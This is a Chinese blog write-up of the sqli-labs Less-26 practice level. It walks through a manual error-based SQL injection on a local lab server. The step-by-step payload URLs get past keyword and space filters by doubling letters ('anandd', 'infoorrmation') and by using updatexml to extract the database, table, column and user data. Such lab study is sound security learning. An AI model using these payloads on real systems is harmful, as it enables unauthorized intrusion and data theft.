SQL注入分析-less-26

SQL注入分析-less-26

近期在学习SQL注入的知识,在此呢,写篇博客记录一下手工注入的过程,中间走的弯路呢就不多提了,主要把自己成功注入的过程和结果在此做一个记录,不喜勿喷哈!

1、按照提示,在地址栏输入参数

在这里插入图片描述

http://192.168.88.129/sqli-labs-master/Less-26/?id=1

结果如下,正常回显:
在这里插入图片描述
使用单引号看看页面会报什么信息:
在这里插入图片描述

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’

从这里判断,这是一个字符型的注入,接下来我们来构造代码来对SQL语句进行闭合。

2、这一关考察的内容是如何绕过空格、*、- -、and、or、/、#等,所以我们在构造代码时要注意绕过以上内容。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd’1’='1

这里,我们用anandd来吃掉字符串中的and字符,成功闭合查询语句:

在这里插入图片描述
闭合以后呢,我们要逐步获取库名、表名、列名和对应字段的数据,这里用SQLMAP跑了一下,没跑出来,或者说没法完整的获取我们需要的数据,所以只能手工去构造代码了。还是这句话,走的弯路就不体现了,这里直接放我注入的过程记录和结果。

3、首先,构造代码来获取库名,我所使用的方法是通过updatexml的方式,通过报错信息来获取库名,这里我在HackBar这个插件上来演示。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,database(),0x7e,1),1))anandd’1’='1

在这里插入图片描述
成功在报错信息中返回库名security。

4、接下来,构造代码获取表名。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=‘security’))
,0x7e,1),1))anandd’1’='1

在这里插入图片描述
成功在报错信息中返回表名,这里我们需要的users这个表中的数据。

5、然后,构造代码获取列名。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=‘security’)anandd(table_name=‘users’))
,0x7e,1),1))anandd’1’='1

在这里插入图片描述

成功在报错信息中返回列名。

6、最后,构造代码获取对应列的数据。

http://192.168.88.129/sqli-labs-master/Less-26/?id=1’anandd(updatexml(1,concat(0x7e,(select(group_concat(id,username))from(security.users))
,0x7e,1),1))anandd’1’='1

在这里插入图片描述
这里成功获取到了数据。

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值